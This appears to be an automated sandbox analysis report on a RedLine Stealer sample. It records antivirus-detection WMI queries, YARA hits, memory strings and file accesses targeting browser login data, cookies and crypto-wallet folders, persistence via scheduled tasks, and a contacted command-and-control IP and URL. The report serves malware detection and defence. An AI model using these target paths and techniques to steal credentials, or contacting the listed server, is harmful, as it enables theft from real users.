Source: l2rMtmFkD6.exe, 00000008.00000002.2206377067.0000000001526000.00000004.00000020.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2226389329.000000000844E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Yara detected Credential Stealer
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507398 Sample: l2rMtmFkD6.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 8 l2rMtmFkD6.exe 7 2->8         started        12 ECcZgk.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\RoamingCcZgk.exe, PE32 8->42 dropped 44 C:\Users\user\...CcZgk.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp5831.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\l2rMtmFkD6.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 70 2 other signatures 8->70 14 l2rMtmFkD6.exe 15 51 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Injects a PE file into a foreign processes 12->68 24 ECcZgk.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 185.222.58.233, 49706, 49708, 49709 ROOTLAYERNETNL Netherlands 14->52 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 Tries to steal Crypto Currency Wallets 14->74 28 conhost.exe 14->28         started        76 Loading BitLocker PowerShell Module 18->76 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        78 Tries to harvest and steal browser information (history, passwords, etc) 24->78 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.222.58.233
 unknown Netherlands
51447 ROOTLAYERNETNL true

Contacted Domains

Name IP Active
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
185.222.58.233:55615 true
  • Avira URL Cloud: safe
 unknown
http://185.222.58.233:55615/ true
  • Avira URL Cloud: safe
 unknown